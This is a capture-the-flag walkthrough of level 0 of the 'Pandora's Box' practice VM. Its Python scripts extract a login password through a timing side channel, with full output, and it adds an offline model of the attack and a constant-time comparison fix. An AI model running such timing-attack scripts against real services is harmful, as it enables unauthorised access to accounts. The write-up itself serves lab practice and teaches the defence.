Lab - Pandora's Box
2015-07-19 23:32
Description
Pandora's Box is a boot2root VM written by c0ne. It focuses on binary exploitation and reverse engineering, and you have to complete all 5 levels to root the box. The binaries in this challenge are absolutely exquisite and extremely well put together. I wanted to do rather comprehensive write-ups for each binary, which would mean a very long article, so I decided to publish each level as a separate blog post.
Walkthrough
Nmap
lab:pandroa/ $ nmap -v -n -sn 192.168.1.1/24 | grep -B 1 "Host is up"
Nmap scan report for 192.168.1.1
Host is up (0.00050s latency).
--
Nmap scan report for 192.168.1.100
Host is up (0.00040s latency).
--
Nmap scan report for 192.168.1.102
Host is up (0.096s latency).
--
Nmap scan report for 192.168.1.106
Host is up (0.00044s latency).
--
Nmap scan report for 192.168.1.108
Host is up (0.000048s latency).
--
Nmap scan report for 192.168.1.187
Host is up (0.00054s latency).
lab:pandroa/ $ nmap -v -n -p- 192.168.1.106

Starting Nmap 6.47 ( http://nmap.org ) at 2015-07-19 09:14 UTC
Initiating Ping Scan at 09:14
Scanning 192.168.1.106 [2 ports]
Completed Ping Scan at 09:14, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 09:14
Scanning 192.168.1.106 [65535 ports]
Discovered open port 22/tcp on 192.168.1.106
Discovered open port 54311/tcp on 192.168.1.106
Completed Connect Scan at 09:14, 2.15s elapsed (65535 total ports)
Nmap scan report for 192.168.1.106
Host is up (0.0069s latency).
Not shown: 65533 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
54311/tcp open  unknown

Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 2.23 seconds
Secure Remote Shell
The service on port 54311 can be connected to using netcat.

lab:pandroa/ $ ncat -v 192.168.1.106 54311
Ncat: Version 6.47 ( http://nmap.org/ncat )
Ncat: Connected to 192.168.1.106:54311.
#######################
# Secure Remote Shell #
#######################
Welcome, please log in
Password: pass
Invalid password!
Password: ^C
A few passwords and some flattery didn’t get me very far.
Password: c0ne r0cks
Invalid password!
Whilst testing for overflows, I found that long inputs do not crash the service: a 100-character string is split into chunks, and each chunk is checked as a separate password attempt (note the two Invalid password! responses).

root@kali:~/vulnhub/pbox/level_0# python -c 'print ("A" * 100)' | nc 192.168.1.106 54311
#######################
# Secure Remote Shell #
#######################
Welcome, please log in
Password: Invalid password!
Password: Invalid password!
I then set out to find the maximum length of the buffer, which also bounds the length of the password. 62 characters is the most that is processed as a single attempt (a single Invalid password!); anything longer is split as above.

root@kali:~/vulnhub/pbox/level_0# python -c 'print ("A" * 62)' | nc 192.168.1.106 54311
#######################
# Secure Remote Shell #
#######################
Welcome, please log in
Password: Invalid password!
Password:
I did write a python script that would attempt passwords from the rockyou wordlist, but nothing popped, and if the password was of any significant length a straight AAAA to ZZZZ brute force would take too long.
Time Based Attack
If you send keystrokes manually, you can see there is a difference in the amount of time it takes for the binary to return Invalid password!: the longer the string, the more pronounced the difference. You may need to watch it a few times to see it, but we can confirm there's a difference by timing it in python.
#!/usr/bin/env python
import socket, time

target = '192.168.1.106'
port = 54311

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
banner = s.recv(512)
prompt = s.recv(512)

# Time a 1-character guess...
s.send("A\n")
t0 = time.time()
response = s.recv(512)
prompt = s.recv(512)
t1 = time.time()

# ...and a 62-character guess, the largest single attempt the buffer takes.
s.send("AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\n")
t2 = time.time()
response = s.recv(512)
prompt = s.recv(512)
t3 = time.time()

print "Short: " + str(t1-t0)
print "Long: " + str(t3-t2)
s.close()

root@kali:~/vulnhub/pbox/level_0# ./level_0.py
Short: 0.0451579093933
Long: 0.26290678978
You can see there is a significantly longer wait for the error message to be returned after sending the longer string. We can take this a step further and time the response of a single character.
For just 1 run, the results were a bit hit-and-miss, so it’s better to send a character several times and work out the average response time.
#!/usr/bin/env python
import socket, time, string, numpy

target = '192.168.1.106'
port = 54311

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
banner = s.recv(512)
prompt = s.recv(512)

for char in (string.ascii_letters + string.digits + string.punctuation):
    # Time the same single-character guess 4 times and average the results.
    times = []
    for _ in range(4):
        t0 = time.time()
        s.send(char + "\n")
        s.recv(512)
        t1 = time.time()
        times.append(t1 - t0)
    average = numpy.mean(times)
    print char + ": " + str(average)

s.close()
If this is run a few times and sorted on the 2nd column, we can easily see that the letter R is consistently the quickest character to be returned.
root@kali:~/vulnhub/pbox/level_0# ./level_0.py | sort -s -n -k 2,2 | head -n 5
R: 0.00170934200287
d: 0.0026016831398
b: 0.00287199020386
i: 0.00288355350494
g: 0.00291323661804
We can assume, therefore, that the password begins with R. Finally, modify the script so that it automatically moves on to the next character to decipher the entire password. We will assume that if the character response is quicker than 0.002s, then it's valid. That cutoff comes from the measurements above and is specific to this host and network; on a different link, take the fastest average per position rather than relying on a fixed threshold.
#!/usr/bin/env python2
# -*- coding: utf8 -*-
import socket
import time
import string
import numpy


def single(sock, data):
    # Send one guess and time how long the service takes to answer.
    starttime = time.time()
    sock.send(data)
    sock.recv(512)
    endtime = time.time()
    return endtime - starttime


def main():
    host = '192.168.1.106'
    port = 54311
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((host, port))
    s.recv(512)  # banner
    s.recv(512)  # "Password:" prompt

    password = ''
    for i in range(80):
        chars = string.ascii_letters + string.digits + string.punctuation
        for char in chars:
            data = "%s%s\n" % (password, char)
            # Average 8 timings per candidate; single samples are too noisy.
            times = [single(s, data) for _ in range(8)]
            average = numpy.mean(times)
            # print char + ": " + str(average)
            if average < 0.002:
                password = password + char
                print "[+] password: %s" % password
                break
    # There is no check for a successful login, so all 80 rounds run and
    # characters keep being appended after the real password is complete.
    print "[+] finally password: %s" % password
    s.close()


if __name__ == "__main__":
    main()
lab:pandroa/ $ python2 crack.py
[+] password: R
[+] password: R3
[+] password: R3s
[+] password: R3sp
[+] password: R3sp3
[+] password: R3sp3c
[+] password: R3sp3ct
[+] password: R3sp3ctY
[+] password: R3sp3ctY0
[+] password: R3sp3ctY04
[+] password: R3sp3ctY04r
[+] password: R3sp3ctY04r4
[+] password: R3sp3ctY04r4d
[+] password: R3sp3ctY04r4dm
[+] password: R3sp3ctY04r4dm1
[+] password: R3sp3ctY04r4dm1n
[+] password: R3sp3ctY04r4dm1ni
[+] password: R3sp3ctY04r4dm1niS
[+] password: R3sp3ctY04r4dm1niSt
[+] password: R3sp3ctY04r4dm1niSt4
[+] password: R3sp3ctY04r4dm1niSt4t
[+] password: R3sp3ctY04r4dm1niSt4t0
[+] password: R3sp3ctY04r4dm1niSt4t0r
[+] password: R3sp3ctY04r4dm1niSt4t0rL
[+] password: R3sp3ctY04r4dm1niSt4t0rL1
[+] password: R3sp3ctY04r4dm1niSt4t0rL1k
[+] password: R3sp3ctY04r4dm1niSt4t0rL1ke
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keY
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3s
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3sp
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spe
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spec
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spect
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY0
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04r
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0d
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0da
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaab
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaaba
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaaaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaaaaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaaaaaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaaaaaaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaaaaaaaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaaaaaaaaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaaaaaaaaaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaaaaaaaaaaaaa
[+] password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaaaaaaaaaaaaaa
[+] finally password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0daaaaaaaaaaaaaaaaaaabaaaaaaaaaaaaaaaa
The script has no stop condition, so it keeps appending characters once the real password is complete (the trailing run of a's and the b are junk), but the password is there: everything up to G0d.
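To make the mechanics concrete, here is an added Python 3 example (not code from the original post or from the VM's binaries) that models the whole attack offline. It assumes a hypothetical cost model in which an early-exit, byte-by-byte comparison costs one unit per byte compared, with optional per-call jitter standing in for network noise; the secret is the password recovered above, used only as the simulated target. It shows the extraction loop with two improvements over the script above (candidates are ranked by averaged cost instead of a fixed threshold, and the loop stops on the first confirmed match rather than running on past the end), plus the fix on the server side: a constant-time comparison over fixed-length hashes. Names such as vulnerable_check, make_oracle, recover and hardened_check are this example's own.

```python
#!/usr/bin/env python3
"""Offline model of the timing oracle behind the Secure Remote Shell login.

vulnerable_check() mimics a byte-by-byte, early-exit comparison and reports
a cost (loop iterations plus optional jitter) that stands in for the response
time measured over the network. recover() is the extraction loop.
hardened_check() is the fix. All names here are this example's own.
"""
import hashlib
import hmac
import random
import statistics
import string

CHARSET = string.ascii_letters + string.digits + string.punctuation

# The password recovered in the write-up, used here only as the simulated secret.
SECRET = "R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0d"


def vulnerable_check(guess, secret=SECRET, noise=0.0, rng=None):
    """Early-exit comparison (strcmp-style), instrumented.

    Returns (matched, cost). Every byte compared costs one unit, so cost grows
    with the length of the correct prefix: the right next byte runs exactly one
    iteration further than any wrong one. `noise` adds up to that many units of
    per-call jitter (hypothetical), so single samples can mislead just as single
    network timings did on the VM. The appended NUL plays the C terminator and is
    assumed not to occur in either string.
    """
    cost = 0
    for g, s in zip(guess + "\0", secret + "\0"):
        cost += 1
        if g != s:
            break
    jitter = (rng or random).random() * noise if noise else 0.0
    return guess == secret, cost + jitter


def make_oracle(noise=0.0, seed=0, secret=SECRET):
    """Bind vulnerable_check to a seeded RNG so a run is reproducible."""
    rng = random.Random(seed)
    return lambda guess: vulnerable_check(guess, secret, noise, rng)


def recover(oracle, charset=CHARSET, samples=8, max_len=80, slower_is_correct=True):
    """Extend the prefix one character at a time from averaged oracle costs.

    In this model the correct character is the slowest. The VM's binary leaked
    the other way (the correct character answered fastest), which is what
    slower_is_correct=False selects against a real service. Returns the
    password, or None if max_len is reached without a confirmed match.
    """
    pick = max if slower_is_correct else min
    prefix = ""
    for _ in range(max_len):
        scores = {}
        for ch in charset:
            guess = prefix + ch
            results = [oracle(guess) for _ in range(samples)]
            if any(ok for ok, _ in results):
                return guess  # stop at the first confirmed login
            scores[ch] = statistics.mean([cost for _, cost in results])
        prefix += pick(scores, key=scores.get)
    return None


def hardened_check(guess, secret=SECRET):
    """Fixed comparison: hash both sides to a fixed length, then compare in
    constant time. hmac.compare_digest on the raw strings would still leak the
    guess length (it returns early when lengths differ); hashing first removes
    even that, so neither content nor length of the guess affects the time."""
    g = hashlib.sha256(guess.encode()).digest()
    s = hashlib.sha256(secret.encode()).digest()
    return hmac.compare_digest(g, s)


if __name__ == "__main__":
    # Jitter of up to 1.5 units swamps the 1-unit signal in a single sample;
    # averaging 16 samples per candidate recovers it anyway.
    print(recover(make_oracle(noise=1.5, seed=1), samples=16))
```

Run it as-is to watch the noisy recovery; lower `samples` to see the averaging matter. Against a live target the oracle would be the `single()` timing function from the script above, with `slower_is_correct=False` because this particular binary answers fastest on the correct prefix.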
lab:pandroa/ $ ncat -v 192.168.1.106 54311
Ncat: Version 6.47 ( http://nmap.org/ncat )
Ncat: Connected to 192.168.1.106:54311.
#######################
# Secure Remote Shell #
#######################
Welcome, please log in
Password: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0d
Logged in successfully, type exit to close the shell
Shell$ id
uid=1001(level1) gid=1001(level1) groups=1001(level1)
Shell$
References
https://www.vulnhub.com/entry/pandoras-box-1,111/
http://rastamouse.me/blog/2015/pandoras-box-1-level-0/